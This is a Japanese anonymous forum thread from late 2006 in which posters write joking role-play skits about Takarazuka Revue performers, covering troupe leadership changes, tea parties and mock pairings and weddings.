ヽ(●▽●)人(●∨●)ノバイバイでつ〜〜

87 :塚塚っこの名無し:2006/10/22(日) 00:59:08 ID:7ymkBs2A
ここ4・5年間、頻繁にトップの人がやめて、変わっていく
のは何故ですか?

88 :名無しさん@花束いっぱい。:2006/10/22(日) 01:38:43 ID:L86t/BM5
(●▽●)ひさしぶりに、よっちゃん先生が踊っていたでつね〜。
(●∨●)ボク見たでつよ!ミエコ先生がよっちゃん先生の背中のぜんま…モガッ!
わ〜〜〜!@あわてて引き返し、(●∨●)の口をふさぐ水。まったく油断がならないな、もう!

…明日からジャンPはキタロウに替わってもらうとしようか@堕天使の微笑みのコムタン 。本日は玉露。
水さんがお忙しいなら仕方がないですね@ニコニコまー。でもオッキーがわたしの双子の兄さん…。

89 :名無しさん@花束いっぱい。:2006/10/22(日) 04:49:27 ID:J+Ypm+SG
>>87
長期にわたりトップに居座った者&トップになってはイケナイのにトップになってしまった者が存在した為

90 :名無しさん@花束いっぱい。:2006/10/22(日) 09:24:06 ID:+AN4nBvq
仕方ありませんね、同期の後始末は私がしなくては
@キタロウの頭を踏みつけてジャンPの衣装をチェックするハマコ

91 :名無しさん@花束いっぱい。:2006/10/22(日) 09:30:26 ID:LQRjhTds
まぁ、舞踊会に出てたしねぇ・・・@キタロウを羽交い締めにしながらあみ@もうすぐ退団

92 :名無しさん@花束いっぱい。:2006/10/23(月) 06:54:14 ID:2r2rRj4a
………………きたろー、生きてる?
堕天使さまからのお茶を持っていきながらサリエルかなめ@マイペース

キタロウ、ごめんね…ただいま@えりたんにより強制連行ミズ
@いろいろあってふらふらです。

93 :名無しさん@花束いっぱい。:2006/10/26(木) 04:28:22 ID:jHT7hlfV
 

94 :名無しさん@花束いっぱい。:2006/10/28(土) 14:14:06 ID:P6oyK4LJ
(●▽●)みずさんが引きづられて帰っちゃってから静かでつね〜
(●∨●)誰かが目立とうとしている前触れでつかね?お兄タソ。

95 :名無しさん@花束いっぱい。:2006/10/28(土) 14:32:37 ID:OwuZgS28
呼んだ?@『目立つ』という言葉にとことん弱いオサ。今がチャンスかしら?

96 :名無しさん@花束いっぱい。:2006/10/28(土) 18:49:11 ID:3VUoP0zo
左手でオサのユニ●ロをつかみつつ、
右手で春野寿美礼対応マニュアル@壮一帆用を執筆中のゆみこ
@当然、全ツ稽古もやってます

97 :名無しさん@花束いっぱい。:2006/10/28(土) 21:31:42 ID:A1Rl3snf
ムシャムシャムシャムシャムシャ

(●▽●)あやしい音が聞こえるでつ
(●∨●)お兄タソのお歌とどっちが怪しいでつかね?

98 :名無しさん@花束いっぱい。:2006/10/28(土) 23:29:35 ID:mSDmjj9Z
(●▽●)チギタン、失敬でつ〜!(ここにも感じドリルの成果が)
     決めたでつ、歌広場で点数勝負でつ!!メラメラ
     お歌自慢の人はみんな来るのでつ!!!
     歌い放題食べ放題でつよ。
     中国帰りの全ツで歌った「あっちちのち〜」予約でつ!!

99 :名無しさん@花束いっぱい。:2006/10/29(日) 14:02:53 ID:W9khAbQB
食べ放題?!@速攻駆け付ける(●´▽`●)
  υ

歌い放題?!@目立つ用意をするオサ

はいはい、今日で全ツ最後だからね〜@捕まえるユヒカル
はいはい、全ツお稽古ですからね〜@捕まえるゆみこ@あと少ししかいないんやから、大人しくしてください

100 :名無しさん@花束いっぱい。:2006/10/30(月) 19:19:07 ID:8kvdkqTt
コムさん・・・@ムラ最後に泣く組子

・・・えと、この人なんとかしてください・・・@困惑中あみたん
うわぁぁぉぉっ@男泣きハマコ

101 :名無しさん@花束いっぱい。:2006/10/30(月) 20:40:05 ID:6aQfRsRz
号泣するハマコの姿も逃さない!
@ビデオ隊かしげ
@照明は自前、レフ板はせしるのデコ
@ついでにビームで夜空にコムさんのサインも照射します

102 :名無しさん@花束いっぱい。:2006/11/01(水) 13:51:24 ID:W660kDmR
さっ、もうすぐ公演始まるぞ〜!@後光(でこ)が眩しいかしげ
・・・はっ、もう11月?!@酔い潰れてた雪組子達

103 :名無しさん@花束いっぱい。:2006/11/01(水) 18:38:05 ID:EJdjj7Yo
いぎゃああああっ! 私の醜態が〜〜〜〜っ
@かしげのビデオに写る自分を確認して動揺ハマコ

……………頼むから静かにして…@ミズ
@二日酔いの頭に響きわたってます
@てか何でこんなに元気なのよ、ハマコ…。

てかお前こそ何でそんなに酒に弱いのさ、ミズ@ハマコ
@自分が強いという自覚がありません
@さ、まーちゃんのMSお稽古行こっと
@動揺が落ち着いたらもう元気

さー、私もMSのお稽古行きませんと。
あ、お茶の用意はできてますからね、コムさん♪
@今日も元気ににこにこまー

104 :名無しさん@花束いっぱい。:2006/11/01(水) 20:11:41 ID:BorWYTnY
(●▽●)SMのお稽古ってなんでつか?

105 :名無しさん@花束いっぱい。:2006/11/01(水) 21:03:51 ID:IUqOY/EL
"さるまわし"の略だ@右にゆうひ先生
"さらまわし"の略でもあるねんけどな@左にきりや教官
宙公演目の前でしょうがーーー!@ゆひきりツインアタックで(●▽●)をヒット!

ナーイスキャッチ!かしげタソ@でこが一段ときらきら
目がつぶれたでつー!!@(×△×)

106 :名無しさん@花束いっぱい。:2006/11/01(水) 22:15:15 ID:W660kDmR
一瞬焦っちゃったじゃないの!@マミさんから貰った鞭を片手にゆら姐さん

(●▽●)は鞭じゃなくて無知・・・か?@(●▽●)用漢字ドリルを送ろうか悩むマミさん

107 :名無しさん@花束いっぱい。:2006/11/04(土) 17:20:15 ID:2nHjYMOm
(●▽●)お化粧が、とてもかわいくできたでつー赤銅鈴之助みたいかもしれないでつ(エッへン!)
ちぎタンはかわいくできたでつか?

108 :名無しさん@花束いっぱい。:2006/11/05(日) 01:21:46 ID:zTvD95RM
(●∨●)オニイタソ できたでつよー! ばかどのみたいにかわいくできたでつー(エッヘン!)

109 :名無しさん@花束いっぱい。:2006/11/05(日) 23:27:49 ID:m6ucztk5
( ゚-゚)バカトノ…@コンサートでやろうかと考える@十八番の芸

110 :名無しさん@花束いっぱい。:2006/11/06(月) 09:26:37 ID:BR1Cx2m7
(●▽●)ちぎタン、ばかとのはいけないでつ!
誰かえらーい人のモノマネになるでつ。
誰だったか…おぼえてないでつ(×▽×) 

111 :名無しさん@花束いっぱい。:2006/11/07(火) 17:42:02 ID:yTB4D33v
(●∨●;)大変でつ!おにいたんがトプさんになるでつ!

!!!!!!?@衝撃のシューマッハ達&お守り役

112 :名無しさん@花束いっぱい。:2006/11/07(火) 17:53:02 ID:QvbFEzpR
(●▽●)かいとうるぱんでつ!くらりすはだれでつか?
(●∨●)オニイタソ、蘭とむサソが探偵さんだから教えてもらうでつ!

(●▽●)人(●▽●)蘭とむサ〜ソ♪


イヤァァァァァァ!@二番手(お守り役)確定蘭とむ

113 :名無しさん@花束いっぱい。:2006/11/07(火) 18:17:05 ID:uGfOZDht
デコビーム応用の黒目ビーム…それから…
@宙トップとして(●▽●)に伝授するあれこれを思案するかしげ
まあ…なんてお優しいのかしら…
@目を潤ませつつ、セラミック鎖の扱い方を宙娘に伝授するるいるい

114 :名無しさん@花束いっぱい。:2006/11/07(火) 21:38:02 ID:KhpUhIOA
かしげさん、大丈夫です。トムにはまわらんか仮面がついていますから!
@無責任発言なゆみこ

その仮面、何に使えるん?@(●▽●)お守り歴長いので
苦労を良く知るきりやん@使えるんやったら、私にもちょーだい

115 :名無しさん@花束いっぱい。:2006/11/09(木) 09:18:23 ID:iYMoGFTp
クラリスにお困りでしたら降臨しますが?@女役にウキウキワクワクな理事@心は乙女

116 :名無しさん@花束いっぱい。:2006/11/09(木) 10:03:40 ID:n/4d2+Gc
(●▽●)理事タンのスカーレット、きれいだったでつ。でもボクの玉勇タンは、もっときれいでかわゆいでつ。名古屋に行ってもいいでつか?

117 :名無しさん@花束いっぱい。:2006/11/09(木) 10:54:45 ID:MgOBe3tq
来るな・・・来るんじゃない・・・!!@必死に念力を送るミズ@新婚なんだ邪魔されてたまるか!!

118 :名無しさん@花束いっぱい。:2006/11/09(木) 19:19:44 ID:aa3umtpO
(●▽●)でもお嫁さんは再婚でつね〜(いらんこといい)
(●∨●)いまのダンナさんとまだまだラブラブでつもんね〜(超いらんこといい)

119 :名無しさん@花束いっぱい。:2006/11/09(木) 22:47:53 ID:pL9+zkIC
今日を入れて後四日…でも、愛するには短すぎるとは言わないよ、となみ
@ぐいっととなみを抱き寄せるワタル
そんなこと言わないで下さい!@つま先浮いてるとなみ

後はお約束のイチャry

ワァァァァァソ!@泣いて走り去る水

120 :名無しさん@花束いっぱい。:2006/11/09(木) 23:33:33 ID:GApQmiXu
独身(?)生活も後3日程か〜・・・@物思いにふけるとうこ@独身最後の日は飲みに行くか?

うぅぅぅ・・・是非お供させて下さい・・・@涙で川を作ってるミズ

121 :名無しさん@花束いっぱい。:2006/11/10(金) 13:20:23 ID:bpYjSQYy
ふうん?初日前の大事な時に飲みにねぇ@グラスに口付けコムタン@妖しい煙が…

じゃあこれはどなたに@ジャンPの衣裳を手にニッコリまー@実は一番狙われてます


122 :名無しさん@花束いっぱい。:2006/11/11(土) 00:52:44 ID:nPPMBW2b
(●▽●)るぱんはふらんす人でつ! じゃんもふらんす人でつ!
    だからボクがやるでつ!!

はいはい、大劇場公演中ですからね…@頭を抱えつつ(●▽●)を引きずる蘭とむ
@先行き不安

123 :名無しさん@花束いっぱい。:2006/11/11(土) 10:30:59 ID:N9XstfXb
(●∨●)蘭とむサソ、お兄タソを叩けば増えるから問題解決でつよ♪@既に叩く準備完了

やめてっ!!@水、とむ@これ以上鬱になりたくない

124 :名無しさん@花束いっぱい。:2006/11/11(土) 11:56:10 ID:08VO4V1j
ミズ…あなたはもう雪ん子 何故あなたが宙の(●▽●)に鬱になるのかしら
@今日はぬくぬく鉄観音茶コムタソ

ハッ!アタシってばいつのまにらんとむの鬱オーラに影響を受けて…
@我に返りつつ冷や汗で川を作るミズタソ

やっぱり(●▽●)は熱湯をかけるかビームで消せること忘れてますなぁ
@手にやかんきりや教官
きりやん、その湯で私たちもお茶にしよ@手にティーセットゆうひ先生

125 :名無しさん@花束いっぱい。:2006/11/11(土) 13:51:27 ID:fQSQzyWD
そこでキュウリサンドも付けるべきかと@気分はアルジャノンきりやん
たきさんもくるしなぁ〜@キュウリを切り始めるユヒカル

126 :名無しさん@花束いっぱい。:2006/11/11(土) 15:59:04 ID:y1LdZY2H
きゅうりサンドはいらん!@樹里社長@ちゃっかり手にマイカップ

127 :名無しさん@花束いっぱい。:2006/11/11(土) 19:22:18 ID:nPPMBW2b
そんな斬り捨てなくても…@涙のアルジャノン蘭とむ@どうしてこう
上も下も…@もはや中間管理職ケテーイ

128 :名無しさん@花束いっぱい。:2006/11/12(日) 01:13:30 ID:2nXtHLdg
じゃあ、社長にはマフィンを@用意がいいきりやん
さっ、かなみんが来る前に食べよう@セッティング完了ユヒカル

129 :名無しさん@花束いっぱい。:2006/11/12(日) 03:01:03 ID:IhoT3BVP
食べ物どこかな〜みん( ● ´ ▽ ` ● )@見逃さない〜聞き逃さな〜い

130 :名無しさん@花束いっぱい。:2006/11/12(日) 10:55:51 ID:FlHT4dTx
自分の相手役は自分で何とかしてください@ダブルアルジャノンズ
俺クマがいなくなったら主役がいないだろー!!@必死の主張俺クマ
……ん?@マフィンをもぐもぐ樹里社長@アーネスト
……え?@そんなアルジャノンにぴったりくっつくあすかグウェンドレン
@今日は独身最後の日なの

クソーーーーーーー!@かなみを抱えて走り去る俺クマ
あすかのバカーーーーーーーー!@泣きながら走り去るとうこ@私も今日が独身最終日

かなみんを抱えるなんて力持ちだなぁ。るいちゃんとどっちが力持ちかな?
@他意のないニコニコかしげ

男役さんには敵いませんわ(ポッ)
@恥じらうるいるい
@(かなみを持ち上げるのに両手が必要なんてまだまだあさこさんも甘いですわ)

131 :名無しさん@花束いっぱい。:2006/11/12(日) 11:02:23 ID:J3hZm79y
樹里社長はアーネストじゃなかったっけ?
@優雅にお茶をしつつゆうひ先生
ええ、千秋楽のアドリブでもう一人のアルジャノンに大嫌いなきゅうりを
食わされて悶えていたアーネストです
@千秋楽でマフィンをアーネストに食わせたアルジャノンきりや先生


132 :名無しさん@花束いっぱい。:2006/11/12(日) 11:07:28 ID:FlHT4dTx
あら嫌だ。間違えちゃったわ
@グウェンドレンあすか
@アーネスト樹里に寄り添いつつ優雅にお茶

133 :名無しさん@花束いっぱい。:2006/11/12(日) 12:21:54 ID:2nXtHLdg
『ゆうが』だけにぼくらもお茶するでつ〜@マイカップ持参(●▽●)つ□(●∨●)つ□

134 :名無しさん@花束いっぱい。:2006/11/12(日) 20:20:23 ID:HjGBDyJ5
どうしたらプロポーズできーる
@虚ろな目で歌うとうこ「あすかの・・・バカ・・・(涙)」

135 :名無しさん@花束いっぱい。:2006/11/12(日) 21:18:27 ID:dxLzHsJZ
>>133カワイイ〜!2人と無関係の娘役達@イチカ、キホ、ミッポウ、アイアイ、シナ、カオリ、ミナミ、ウメ

136 :名無しさん@花束いっぱい。:2006/11/12(日) 23:13:02 ID:2nXtHLdg
月娘よ・・・(●▽●)の歌の破壊力を忘れたか?@ボソッときりやん
うっ!@動きが止まるあいあい(TCAでも歌った)&みっぽー

137 :名無しさん@花束いっぱい。:2006/11/13(月) 01:12:55 ID:eSrfqOMv
あ〜すか〜v@独身最後の夜に飲んだくれてたとうこ@もう13日や!

となみちゃ〜ん・・・(涙)@おあずけ状態のミズ@まだ東宝が残ってます。

138 :名無しさん@花束いっぱい。:2006/11/13(月) 01:30:19 ID:wODeBVvp
>136きりやんさん
ああ私は大丈夫っす!他人の事は言えないっていうか・・・
慣れてますから・・・自主トレ?・・・し、失礼だなぁ・・・あ、でも
とうこさんが心配だから・・・やっぱ星組に帰ります!
みなみ先輩お先っす!@アンドレ扮装に早替わりしつつ走り出す男前ウメ

139 :名無しさん@花束いっぱい。:2006/11/13(月) 09:53:23 ID:rRrwufvQ
樹里さ〜ん(はぁと)@笑顔で近付くあすか
こら!あかんやろ!@本気説教樹里社長
だってとうこさんの泣き顔って可愛いくて大好きなんですもの@お惚気?あすか
…泣き顔写真、売れるなぁ。よし!どんどん泣かせるで!@浪速の商人樹里社長


まーさぁーんっ!@まーちゃんに抱き着くとなみ@師匠ですから
お帰りなさいとなみ。まずはお茶をどうぞ@にこにこまーちゃん
あの…あの…@となみに近付けずオロオロ水
まあ水さん、何か?@にこにこまーちゃん
いえ…何も…(ノД`)@号泣水

140 :名無しさん@花束いっぱい。:2006/11/13(月) 14:16:19 ID:87d7tHBL
じゃあ水には私がお茶を入れてあげよう@すでに堕天使モードなコム
正確には私が入れた(調合した)んですけどね@今日もお側にはサリエル

え?え?煙が紫なんですが…@でも手が勝手に

141 :名無しさん@花束いっぱい。:2006/11/15(水) 00:46:30 ID:QdM2GQWZ
(●▽●)アハハ〜、ミズタソがおかしくなってまつよ〜。お茶から煙はでないでつ!

142 :名無しさん@花束いっぱい。:2006/11/15(水) 08:57:57 ID:bnQQAtB/
(●∨●)でつよねー…って、お兄タン! ミズさんが倒れてまつ!


…………はいはい、東京の舞台稽古に紛れ込まないように。
さ、うちらも公演中だからねー。帰るよー。
@兄弟の引率に来てしまった蘭とむ@だって鎖をもってる方がかしげさんと
お話中で気づいてくれないんだもん…

143 :名無しさん@花束いっぱい。:2006/11/15(水) 16:38:05 ID:LrSNslxQ
らんとむさんってぇ〜大変そうだなぁー@遠くでみていたともちん、七、十@相変わらずぼーっとしてる

144 :名無しさん@花束いっぱい。:2006/11/15(水) 20:54:36 ID:xwdLbKxo
あー、ほんと、大変そうだなあ・・・@ここで川柳を一首@オサレトプ

145 :名無しさん@花束いっぱい。:2006/11/16(木) 00:32:22 ID:x28DhnK6
( ● ´ ▽ ` ● )お鍋するのかな?みん@それは柳川鍋@すかさず残りの茶を完飲

146 :名無しさん@花束いっぱい。:2006/11/18(土) 17:33:54 ID:BmF9FgWT
(●▽●)さいきんアヒタソがでてこないでつね

147 :名無しさん@花束いっぱい。:2006/11/18(土) 20:07:04 ID:gTC2lc1d
エッフェル塔じゃないなんて・・・orz@あひ



148 :名無しさん@花束いっぱい。:2006/11/20(月) 23:56:42 ID:EE3Nhlmi
エッフェル塔役、空きがあるの?!@出演準備オサ@世界的に有名な役じゃん!!

…アタシもあと10日しかいられないんだから、今のうち練習しとき@後任えりたんを教育中ゆみこ@引継ぎはちゃんとせな

ええっ、あ、あれを止めろと?!@滝汗えりたん

149 :名無しさん@花束いっぱい。:2006/11/21(火) 00:06:57 ID:jQV0CCp+
トウコさん、あすかと楽屋出一緒にしちゃったりなんかして、しっかりイチャイ(ryしてるじゃないですかっ!
昔のトウコさんはドコ行っちゃったんですか〜っ!
@早くイチャイ(ryしてみたい、でもできるかどうかも分からないミズ
@東宝から泣きながら心の叫び

150 :名無しさん@花束いっぱい。:2006/11/21(火) 00:39:55 ID:+IvGx83g
え?何?ごめん、聞こえんかった〜@絶好調イチャ(ry中のとうこ@だってムラにいるんだもん

ウワァァン!!。・゜゜(ノД`)@涙で湖をつくるミズ@体の自由がきかないので逃げられない

151 :名無しさん@花束いっぱい。:2006/11/21(火) 00:48:18 ID:N7zhga2/
"あの"雪組で調教されたなら大丈夫 アナタならできる
@今度は"あの"雪組へ行くことになるゆみこタソ
@でも操るのはミズタソだけだから

そっすね!ではさっそく
オサさん!エッフェル塔は顔が長くても足が短くても背が高くないと
できません!あきらめましょう!
@さっくりと心臓をエグる言葉、悪意0のエリタソ
@さすが"あの"雪組で調教されただけはある

152 :名無しさん@花束いっぱい。:2006/11/21(火) 08:09:55 ID:61C2HgmQ
イチャイチャしてるわりにとうこの目は泣き腫してるよね…@今日は抹茶と大福なコム
とうこさんの泣き顔って可愛いですからねー@今日もコムまーとお茶なとなみ
ねー♪ほんっと可愛いのよとうこさん!@一緒に加わる同期のあすか
アメとムチって大切ですものね@あすかにお茶を立ててるにこにこまー


あの…その………いえ、いいです…@今日もとなみに近づけない水
東宝楽まではあの状態でガードっぽいですね@もう帰ってきたえりたん@サクッ

153 :名無しさん@花束いっぱい。:2006/11/22(水) 13:56:32 ID:wpRn2zqA
水・・・ええか、新婚生活は最初が肝心なんやで?@泣き腫らした目でとうこ
すいません・・・私ももう手遅れかと・・・@もらい泣きする水

154 :名無しさん@花束いっぱい。:2006/11/22(水) 14:41:53 ID:f/xRy0ic
まじウゼーなこの糞スレ
コンビ組まされたら誰でも上手くいくわけー?
本人望んでねーし

155 :名無しさん@花束いっぱい。:2006/11/22(水) 17:26:20 ID:wySA69+B
女帝の糸目ビームが懐かしい…154を妬いて貰えないだろうかのぉ@絵を描きながらトド理事。

156 :名無しさん@花束いっぱい。:2006/11/22(水) 17:36:06 ID:evIRMIiJ
イシさん!僕がお役に立てるんでしたら!すずみん@プチデコビーム

157 :名無しさん@花束いっぱい。:2006/11/22(水) 18:12:46 ID:DfYG9ucU
波動砲貸そうか?@ハマコをスタンバイさせるコム
デコ貸しましょうか?@にこにこかしげ

158 :名無しさん@花束いっぱい。:2006/11/22(水) 21:25:55 ID:dRmJ5bZH
宜しければ底なし沼への封印(=ガムテ)を解きますよ@( ● ´ □ ` ● )をポン!とゆうひ先生
得体の知れん電波ならいつでもゆうて@片手に(●▽●)きりや教官
リフトして遠投ならおまかせください@二の腕がりりしい腰リウ
ツーステップで駆けつけます!フレームインなら大得意です!@なんか勘違いマツィオ様
ほーほほほほほ、アタクシの美声でオペラ座の壁だって壊してみせてよ!
@どんとこいイズモ新組長

フッ新しい組長を迎えても月組子の結束はゆるぎないわ
@丸い目を細めてご満悦冷静エリさん

こんなに頼もしい組子に支えられて嬉しいっす@orzオレクマ
ボク何のお役に立てるでしょう…@orzひざびさ鬱組アヒ
…えーと…分からないからとりあえずお付き合いします@orzそのか

159 :名無しさん@花束いっぱい。:2006/11/23(木) 01:17:07 ID:arBcnCyf
>>154
禿同


160 :名無しさん@花束いっぱい。:2006/11/23(木) 01:21:16 ID:k419UpvG
ネタスレでマジレス・・・カコワルイ・・・@オサの陰からあやね

161 :名無しさん@花束いっぱい。:2006/11/23(木) 07:42:21 ID:ZfaR4hb2
オサさーん、>>154>>159を始末したら目立ちますよー@東宝から叫んでみるエリタソ
目立てる!?>>160の彩音のためにもやるわ@エリタソの声を聞き俄然張り切るオサ
よしよし、これなら安心して雪に行けるわ@オサの横でエリタソの声を聞いたゆみこ

162 :名無しさん@花束いっぱい。:2006/11/23(木) 08:27:40 ID:ieCykK11
まーちゃん、あやねちゃんが喋ったお祝いにとっておきのお茶を淹れてくれるかな?@とっておきのティーセットを出すコム
では秘蔵のお茶をだしましょうね@今日もにこにこまーちゃん
>154、>159はあやねちゃんにお喋りさせるためにいらしたんですね@ご相伴にあずかっておりますとなみ


163 :名無しさん@花束いっぱい。:2006/11/23(木) 08:38:15 ID:UotIasjo
花が(あるいみ)平和になってる………。
@美声を披露する(本人はハマコのように攻撃しているつもり)オサと
雪のメンバーに混じって初々しくお茶を飲んでいるあやねに
衝撃を受ける蘭とむ

えりたん………さすがは”あの”雪でコムさんに育てられただけあるわ…
@恐ろしい子…と呟いてみるゆみこ

”この”雪でコムさんとご一緒してるのに何であんたは…
@お茶のお菓子の使い走りをしてるミズを横目で見ながらハマコ

いや…えーと@苦労人抜けきれず、なミズ

164 :名無しさん@花束いっぱい。:2006/11/23(木) 09:01:04 ID:arBcnCyf
あほらし

165 :名無しさん@花束いっぱい。:2006/11/23(木) 09:16:03 ID:Yv8aom/+
ここはやはり、ワタクシの出番ですわね…。
タカコさん!ワタクシの勇士をしかと見届けて下さいますね!
>>164に糸目ビーム準備のマリタソ

(゚-゚)ウン…見てるよずっと
…コソコソと雪時代の仲間の所に避難@
あ、チギ新公お疲れ!二人で見てたよ…宙から(儚げな笑)
久々のタカコさんや!私、トップになりました!
嫁を紹介っと…おーい、あすか〜@瞳子もマリタソの同期なんだよね…



166 :名無しさん@花束いっぱい。:2006/11/23(木) 09:29:08 ID:unwnKY2K
>165おハナ
元気そうで何よりだけど勇士じゃなくて雄姿だよ
@ぼそっとコム

167 :名無しさん@花束いっぱい。:2006/11/23(木) 14:07:38 ID:5EMMLcdv
ふささんお久しぶりでつ!!
あれっオササソどこにいるんでつか@といきなり(●▽●)乱入@いらんこといい

168 :名無しさん@花束いっぱい。:2006/11/23(木) 15:02:52 ID:EY4Gd/rQ
オマイは勇士と雄姿と勇姿とゆう氏の違いについてでも考察シテイルガイイ・・・
@これが二言目の彩音@実はオサの腹話術?

169 :名無しさん@花束いっぱい。:2006/11/23(木) 22:01:55 ID:JaNzNmKM
(●▽●)ボクは…どこかで楽しくおうたをうたっていたら、いつのまにか箱に入って、帰ってきただけでつよー
まだうたうでつ!
♪♪♪♪♯♭♯♭

170 :名無しさん@花束いっぱい。:2006/11/24(金) 11:09:33 ID:X2wgkrGc
(●▽●)をファントムになって稽古すれば目立てるかも…@そう思ったオサ
僕に(●▽●)の歌をみさせてくれ@初代ファントム(゚-゚)登場

171 :名無しさん@花束いっぱい。:2006/11/28(火) 20:19:29 ID:UwdXzLTm
(●▽●)わ〜い!タカコさんでつ〜どこへ行っていたでつか〜?
ボクは…ボクは…お嫁さんがなかなか決まらないので、寂しいでつ〜(〒▽〒)

172 :名無しさん@花束いっぱい。:2006/11/28(火) 22:42:20 ID:gjEOKTtn
|
|⌒彡
|冫、)
|` / <お嫁さん・・・?
| /
|

173 :名無しさん@花束いっぱい。:2006/11/28(火) 23:57:41 ID:/QC88aPO
最近あやねと私のキャラ被ってんジャマイカゴルァ!@久々の御登場アリス
出番少ないぞゴルァ!



(●∨●)アリスたんとマリタンの区別がつかないでつ



Σ(´Д`;)Σ(´Д`;)Σ(´Д`;)>宙組子

(゚-゚)すっかりタニに似ちゃって…
教育し直します!>かし&るい

174 :名無しさん@花束いっぱい。:2006/11/29(水) 00:06:22 ID:9mPKhLcR
(●▽●)フササソにはタカコタソがいるでつ
うわきはイクナイでつよ

175 :名無しさん@花束いっぱい。:2006/11/30(木) 11:20:22 ID:kQ80AUTi
(●∨●)オニイタソのヲヨメタソもなかなか決まらないでつね〜
      オニイタソはどんなヲヨメタソをえらぶでつか?

(●▽●)そうでつね〜
      ボクはヲカヲやイ本型はきにしないでつ!
      そんなちっちゃいことをきにするヲトコではないんでつよ…。

176 :名無しさん@花束いっぱい。:2006/11/30(木) 13:39:44 ID:ua5nnQZY
そんな(●▽●)(●∨●)の会話を小耳にはさんだタキ組長@アタクシ、宙組に戻ろうかしら?

177 :名無しさん@花束いっぱい。:2006/11/30(木) 17:46:43 ID:MXFRYN+w
タキ組長、戻ってきて下さい・・・@宙組子

178 :名無しさん@花束いっぱい。:2006/11/30(木) 17:47:44 ID:OZac3+7V
ウメよ・・・アンドレの扮装しとるところ悪いが、(●▽●)のお嫁さんになるんやな@しみじみとうこ

うぅぅ・・・めでたい!宴会や〜!@男泣きじゅんこさん@手には既に一升瓶

・・・・・・へ?@鬘装着直前ウメ

179 :名無しさん@花束いっぱい。:2006/11/30(木) 18:03:35 ID:nVHMKtXs
さあうめちゃん、これを…@そっと(●▽●)制御鎖を渡するいるい
大丈夫だよー、チギはとってもいい子だから@にこにこかしげ@何も考えてない?
漢な娘1が続くのね宙組は@遠くを見つめる蘭とむ@(●▽●)の制御は任せた!

180 :名無しさん@花束いっぱい。:2006/12/02(土) 15:22:40 ID:bm1yePnI
(●▽●)わーい♪わーい♪
チギチャン、とうとうボクのオヨメタンが決まったでつよ♪

(●∨●)わーい♪わーい♪
オニイタン、おめでとうでつ。
ボクにもオネイタンができるでつね。

浮かれてんじゃねーよ、ヴォケ!@不機嫌アリス

181 :名無しさん@花束いっぱい。:2006/12/04(月) 20:12:22 ID:bFbSfpA+
(`(ェ)´)・・・細くて軽い嫁さんって・・・いいな。。。@オレクマ心の声

( ● ´∇` ● )お稽古中はいつもより食欲が増えちゃうかなみん♪

182 :名無しさん@花束いっぱい。:2006/12/05(火) 11:50:18 ID:O1aB7QpG
(●▽●)チギたん、ボクのお嫁さんをこっそり見に行くでつよ〜ウメちゃんは、ほしぐみさんのお稽古場にいるんでつ♪そーっと覗くでつ♪
@「どもっ、お疲れっす!」いつものように男前なウメ。
(●▽●)きゃっ、かっこいいお嫁たんでつ〜

183 :名無しさん@花束いっぱい。:2006/12/05(火) 21:41:49 ID:CU494dht
(●∨●)オニイタン、間違えてまつ
    お嫁たんではなく、お婿たんをもらうんでつね

184 :名無しさん@花束いっぱい。:2006/12/05(火) 22:14:26 ID:DKUfXi4u
(●▽●)のウェディングドレスはどんなのがいいかな?るいちゃん
@真剣にニコニコかしげ
え?え…?@どこまで本気かわからず困惑るいるい@きらきらの瞳が素敵です…

185 :名無しさん@花束いっぱい。:2006/12/06(水) 00:28:08 ID:/77nbQEo
(●∨●)お兄タソ〜♪バナーナの形をしたドレスがありまつた〜

(●▽●)バナナでつか!?

私もバナナみたいなドレスですみれちゃんやれば目立てたかしら…
@(●▽●)が目立ちまくりで目立ちたいオサ

私はパイナップルをやったな〜@ゆったり紅茶なコム

186 :名無しさん@花束いっぱい。:2006/12/06(水) 08:54:06 ID:0BfEJeH2
(●▽●)玉勇たんやった事あるでつ!着物もイケルでつ!ひざ折りもできるでつよ〜!

@いつかのTCAで着た、新撰組の扮装をしてみるウメ。

187 :名無しさん@花束いっぱい。:2006/12/06(水) 13:32:45 ID:RnUJPqma

次期宙組主演男役及び主演娘役について(2006年12月6日)


この度、宙組次期主演男役に陽月 華、宙組次期主演娘役に大和悠河が内定いたしました。



・・・ということになるんじゃないかとヒヤヒヤしてる家政婦協会@ちょっとwktkもしてる

188 :名無しさん@花束いっぱい。:2006/12/06(水) 13:56:41 ID:9ggGjz9b
いいお婿さんが貰えてよかったねぇ@父の気持ちでにこにこかしげ
そうですねぇ@かしげさんが幸せならそれでいいんです@にこにこるいちゃん

189 :名無しさん@花束いっぱい。:2006/12/07(木) 12:40:02 ID:JKhex9i5
(●∨●)お兄タンだけオヨメタソ…僕もオヨメタソになるでつ!
オムコタソ…オムコタソ…キョロキョロ

ぇ…チギちゃんっ…@スローで振り向くしみこ
@一応王子になれなくもないし、お嫁さん居ないし、ウメと同期だし…(ドキドキ)

(●∨●)あ、トウコサソー!僕をトウコサソのオヨメタソにして下さいでつー!
チャイナレディでゆうわくするでつー!

(●▽●)チギチャソにもオムコタソができるでつねー♪…みこタソ沈んでまつよ?

190 :名無しさん@花束いっぱい。:2006/12/07(木) 22:35:36 ID:tb/ZndDJ
ワタシはイシちゃんのお嫁さんに…と顔を赤らめるオサ@とにかく話題にのぼりたい

191 :名無しさん@花束いっぱい。:2006/12/07(木) 23:07:13 ID:+b+NvwO6
そんなオサの袖をひっぱっるあやね@無言

192 :名無しさん@花束いっぱい。:2006/12/08(金) 20:27:34 ID:+F3t+/KA
そんな彩音の真似をしてみるオサ@アタシ、カワイイ?

193 :名無しさん@花束いっぱい。:2006/12/08(金) 22:12:32 ID:cNxPJZ9j
マッ……マサチャーソ……@ハァハァな俺クマタソ

194 :名無しさん@花束いっぱい。:2006/12/09(土) 00:04:32 ID:lAX9exG2
|
|⌒彡
|冫、)
|` / <アサコさん、みほこさんがヤケ食いしてましてよ
| /
|


195 :名無しさん@花束いっぱい。:2006/12/09(土) 00:28:14 ID:H7H47K7g
壁の向こうのお花様に寄り添う彩音@先輩…イロイロ伝授を…!

196 :名無しさん@花束いっぱい。:2006/12/09(土) 02:36:51 ID:a4IDJKww
っていうか(●∨●)のアレは止めなくていいのか…
新婚なのに兄弟につきまとわれるトウコさんがあまりに気の毒
@心配になった宙組子@87同期、何とかしなさい!

(●`∧´●)食べ物よこせ〜かなみん!
暴れる前に口の中へ食べ物を放り込むアヒ
……(●´〜`●)モグモグ…オツなお味ですな
…ウマー(●´▽`●)

197 :名無しさん@花束いっぱい。:2006/12/09(土) 07:23:30 ID:ct9CY/G3
